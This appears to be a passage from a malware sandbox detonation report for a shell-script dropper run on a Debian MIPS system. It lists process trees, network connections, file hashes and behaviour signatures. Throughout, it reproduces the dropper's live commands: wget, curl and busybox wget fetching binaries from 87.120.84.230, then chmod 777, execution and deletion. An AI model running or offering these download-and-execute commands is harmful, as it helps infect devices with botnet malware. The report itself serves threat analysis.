[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

debian9-mipsel-20240611-en

Max time kernel

68s

Max time network

67s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

